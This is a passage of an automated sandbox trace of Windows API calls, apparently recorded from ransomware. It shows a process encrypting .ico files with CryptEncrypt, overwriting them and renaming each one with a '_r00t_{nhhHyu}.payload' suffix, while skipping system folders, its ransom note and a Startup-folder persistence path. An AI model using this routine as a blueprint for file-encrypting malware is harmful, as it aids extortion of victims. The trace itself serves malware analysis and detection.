lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.581] CloseHandle (hObject=0x438) returned 1 [0060.582] GetProcessHeap () returned 0x5e0000 [0060.582] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.582] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico_r00t_{nhhHyu}.payload") returned 68 [0060.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.583] GetProcessHeap () returned 0x5e0000 [0060.583] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.583] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0060.583] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Windows") returned -1 [0060.583] lstrcmpiW (lpString1="Rotate5.ico", lpString2="$Recycle.bin") returned 1 [0060.583] lstrcmpiW (lpString1="Rotate5.ico", lpString2="System Volume Information") returned -1 [0060.583] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Program Files") returned 1 [0060.583] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Program Files (x86)") returned 1 [0060.583] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 46 [0060.583] StrStrIW (lpFirst="Rotate5.ico", lpSrch=".payload") returned 0x0 [0060.583] lstrcmpW (lpString1="Rotate5.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.583] lstrcmpW (lpString1="Rotate5.ico", lpString2="taridd") returned -1 [0060.583] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.583] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.583] GetTickCount () returned 0x114f926 [0060.583] GetTickCount () returned 0x114f926 [0060.583] GetTickCount () returned 0x114f926 [0060.583] GetTickCount () returned 0x114f926 [0060.583] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.583] GetProcessHeap () returned 0x5e0000 [0060.583] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.583] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.585] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.585] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.585] GetProcessHeap () returned 0x5e0000 [0060.585] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.585] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.585] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.585] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.585] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.585] CloseHandle (hObject=0x438) returned 1 [0060.586] GetProcessHeap () returned 0x5e0000 [0060.586] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.586] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico_r00t_{nhhHyu}.payload") returned 68 [0060.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.586] GetProcessHeap () returned 0x5e0000 [0060.587] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.587] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0060.587] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Windows") returned -1 [0060.587] lstrcmpiW (lpString1="Rotate6.ico", lpString2="$Recycle.bin") returned 1 [0060.587] lstrcmpiW (lpString1="Rotate6.ico", lpString2="System Volume Information") returned -1 [0060.587] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Program Files") returned 1 [0060.587] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Program Files (x86)") returned 1 [0060.587] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 46 [0060.587] StrStrIW (lpFirst="Rotate6.ico", lpSrch=".payload") returned 0x0 [0060.587] lstrcmpW (lpString1="Rotate6.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.587] lstrcmpW (lpString1="Rotate6.ico", lpString2="taridd") returned -1 [0060.587] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.587] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.587] GetTickCount () returned 0x114f926 [0060.587] GetTickCount () returned 0x114f926 [0060.587] GetTickCount () returned 0x114f926 [0060.587] GetTickCount () returned 0x114f926 [0060.587] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.587] GetProcessHeap () returned 0x5e0000 [0060.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.587] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.589] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.589] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.589] GetProcessHeap () returned 0x5e0000 [0060.589] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.589] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.589] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.589] CloseHandle (hObject=0x438) returned 1 [0060.590] GetProcessHeap () returned 0x5e0000 [0060.590] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.590] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico_r00t_{nhhHyu}.payload") returned 68 [0060.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.590] GetProcessHeap () returned 0x5e0000 [0060.590] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.590] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0060.590] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Windows") returned -1 [0060.590] lstrcmpiW (lpString1="Rotate7.ico", lpString2="$Recycle.bin") returned 1 [0060.590] lstrcmpiW (lpString1="Rotate7.ico", lpString2="System Volume Information") returned -1 [0060.590] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Program Files") returned 1 [0060.590] lstrcmpiW (lpString1="Rotate7.ico", lpString2="Program Files (x86)") returned 1 [0060.591] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 46 [0060.591] StrStrIW (lpFirst="Rotate7.ico", lpSrch=".payload") returned 0x0 [0060.591] lstrcmpW (lpString1="Rotate7.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.591] lstrcmpW (lpString1="Rotate7.ico", lpString2="taridd") returned -1 [0060.591] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.591] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.591] GetTickCount () returned 0x114f936 [0060.591] GetTickCount () returned 0x114f936 [0060.591] GetTickCount () returned 0x114f936 [0060.591] GetTickCount () returned 0x114f936 [0060.591] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.591] GetProcessHeap () returned 0x5e0000 [0060.591] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.591] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.592] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.592] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.593] GetProcessHeap () returned 0x5e0000 [0060.593] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.593] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.593] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.593] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.593] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.593] CloseHandle (hObject=0x438) returned 1 [0060.594] GetProcessHeap () returned 0x5e0000 [0060.594] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.594] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico_r00t_{nhhHyu}.payload") returned 68 [0060.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.594] GetProcessHeap () returned 0x5e0000 [0060.594] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.594] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0060.594] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Windows") returned -1 [0060.594] lstrcmpiW (lpString1="Rotate8.ico", lpString2="$Recycle.bin") returned 1 [0060.594] lstrcmpiW (lpString1="Rotate8.ico", lpString2="System Volume Information") returned -1 [0060.594] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Program Files") returned 1 [0060.594] lstrcmpiW (lpString1="Rotate8.ico", lpString2="Program Files (x86)") returned 1 [0060.594] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 46 [0060.594] StrStrIW (lpFirst="Rotate8.ico", lpSrch=".payload") returned 0x0 [0060.594] lstrcmpW (lpString1="Rotate8.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.594] lstrcmpW (lpString1="Rotate8.ico", lpString2="taridd") returned -1 [0060.595] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.595] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.595] GetTickCount () returned 0x114f936 [0060.595] GetTickCount () returned 0x114f936 [0060.595] GetTickCount () returned 0x114f936 [0060.595] GetTickCount () returned 0x114f936 [0060.595] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.595] GetProcessHeap () returned 0x5e0000 [0060.595] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.595] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.597] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.597] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.597] GetProcessHeap () returned 0x5e0000 [0060.597] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.597] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.597] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.598] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.598] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.598] CloseHandle (hObject=0x438) returned 1 [0060.598] GetProcessHeap () returned 0x5e0000 [0060.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.599] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico_r00t_{nhhHyu}.payload") returned 68 [0060.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.602] GetProcessHeap () returned 0x5e0000 [0060.602] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.602] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0060.602] lstrcmpiW (lpString1="Save.ico", lpString2="Windows") returned -1 [0060.602] lstrcmpiW (lpString1="Save.ico", lpString2="$Recycle.bin") returned 1 [0060.602] lstrcmpiW (lpString1="Save.ico", lpString2="System Volume Information") returned -1 [0060.602] lstrcmpiW (lpString1="Save.ico", lpString2="Program Files") returned 1 [0060.602] lstrcmpiW (lpString1="Save.ico", lpString2="Program Files (x86)") returned 1 [0060.602] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 43 [0060.602] StrStrIW (lpFirst="Save.ico", lpSrch=".payload") returned 0x0 [0060.602] lstrcmpW (lpString1="Save.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.602] lstrcmpW (lpString1="Save.ico", lpString2="taridd") returned -1 [0060.602] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.602] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.602] GetTickCount () returned 0x114f936 [0060.602] GetTickCount () returned 0x114f936 [0060.602] GetTickCount () returned 0x114f936 [0060.602] GetTickCount () returned 0x114f936 [0060.602] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.603] GetProcessHeap () returned 0x5e0000 [0060.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.603] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.689] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.689] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.690] GetProcessHeap () returned 0x5e0000 [0060.690] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.690] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.690] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.690] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.690] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, 